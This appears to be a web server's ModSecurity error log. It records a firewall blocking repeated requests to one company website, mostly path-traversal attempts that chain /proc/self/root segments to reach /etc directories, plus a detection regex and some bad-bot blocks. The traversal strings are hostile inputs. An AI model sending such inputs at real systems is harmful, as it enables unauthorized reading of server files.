[Wed Mar 18 14:06:41.108578 2026] [:error] [pid 15826:tid 140411683178240] [client 74.7.243.128:43576] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrboeoXxyEfFpUF8f-S1QAAAUc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 14:07:12.232042 2026] [:error] [pid 15051:tid 140411649607424] [client 74.7.243.128:39674] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrbwCmAPhZkrhU8w4mPkQAAAIs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 14:07:13.561809 2026] [:error] [pid 31803:tid 140411565680384] [client 74.7.243.128:45882] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrbweyqAr6etmhZHNrp-QAAAFU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 14:07:24.567445 2026] [:error] [pid 31803:tid 140411716749056] [client 74.7.243.128:45896] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrbzOyqAr6etmhZHNrqCQAAAEM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 14:08:15.956640 2026] [:error] [pid 11816:tid 140411641214720] [client 74.7.243.128:60626] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrb_-w_le52K8_3pV3_vQAAAgw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 14:08:24.544179 2026] [:error] [pid 17887:tid 140411741927168] [client 74.7.243.128:36508] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrcCAkwaGbbGflqUZAziQAAAMA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 14:08:30.153015 2026] [:error] [pid 26799:tid 140411683178240] [client 74.7.241.31:59474] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrcDta6ubjKNq_cu4bA7gAAA0c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 14:08:37.503083 2026] [:error] [pid 26799:tid 140411540502272] [client 74.7.241.31:37666] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrcFda6ubjKNq_cu4bA-AAAA1g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 14:08:40.870989 2026] [:error] [pid 17653:tid 140411716749056] [client 74.7.243.128:40726] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrcGMdf6f5d65gmYZT3iwAAAsM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 14:08:48.659759 2026] [:error] [pid 14269:tid 140411691570944] [client 74.7.241.31:42308] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/var/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrcIAbLMZ6AikZjR9XiKQAAAAY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/var/run/initramfs/state/etc
[Wed Mar 18 14:09:13.154969 2026] [:error] [pid 31803:tid 140411699963648] [client 74.7.241.31:47370] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrcOeyqAr6etmhZHNrqOQAAAEU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 14:09:19.499199 2026] [:error] [pid 11816:tid 140411691570944] [client 74.7.228.61:42938] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abrcP-w_le52K8_3pV3_-QAAAgY"]
[Wed Mar 18 14:09:20.158785 2026] [:error] [pid 11816:tid 140411666392832] [client 74.7.244.43:60934] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abrcQOw_le52K8_3pV3_-wAAAgk"]
[Wed Mar 18 14:09:50.447948 2026] [:error] [pid 30077:tid 140411733534464] [client 74.7.241.31:39340] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrcXvu8EFLIOrSqIpskrgAAAkE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 14:09:56.898612 2026] [mime_magic:error] [pid 11816:tid 140411683178240] (70014)End of file found: [client 74.7.243.128:58794] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/usr/lib/firmware
[Wed Mar 18 14:10:08.967479 2026] [:error] [pid 15826:tid 140411733534464] [client 74.7.243.128:43438] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrccOoXxyEfFpUF8f-TcAAAAUE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 14:10:11.412365 2026] [:error] [pid 26799:tid 140411691570944] [client 74.7.241.31:42480] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrccta6ubjKNq_cu4bBJgAAA0Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 14:10:14.359293 2026] [:error] [pid 31803:tid 140411699963648] [client 74.7.241.31:49364] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrcduyqAr6etmhZHNrqagAAAEU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 14:10:30.548462 2026] [:error] [pid 14269:tid 140411599251200] [client 74.7.243.128:41232] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrchgbLMZ6AikZjR9XiYQAAABE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:10:35.098626 2026] [:error] [pid 15826:tid 140411574073088] [client 74.7.243.128:55120] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrci-oXxyEfFpUF8f-TfgAAAVQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 14:10:36.383458 2026] [:error] [pid 26799:tid 140411725141760] [client 74.7.243.128:55128] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrcjNa6ubjKNq_cu4bBNQAAA0I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 14:11:10.826696 2026] [:error] [pid 14269:tid 140411632822016] [client 74.7.243.128:55130] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrcrgbLMZ6AikZjR9XiiQAAAA0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:11:37.399716 2026] [mime_magic:error] [pid 30077:tid 140411716749056] (70014)End of file found: [client 57.141.18.49:50668] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 14:12:45.349997 2026] [:error] [pid 17887:tid 140411649607424] [client 74.7.243.128:58184] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrdDQkwaGbbGflqUZA0ZAAAAMs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
